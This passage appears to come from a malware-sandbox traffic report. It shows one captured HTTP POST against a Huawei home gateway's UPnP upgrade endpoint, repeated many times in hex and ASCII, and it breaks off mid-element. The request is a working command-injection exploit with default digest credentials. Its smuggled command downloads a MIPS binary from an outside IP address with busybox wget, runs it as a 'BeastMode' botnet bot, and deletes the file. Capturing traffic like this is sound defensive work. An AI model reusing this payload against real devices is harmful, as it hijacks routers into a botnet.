?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 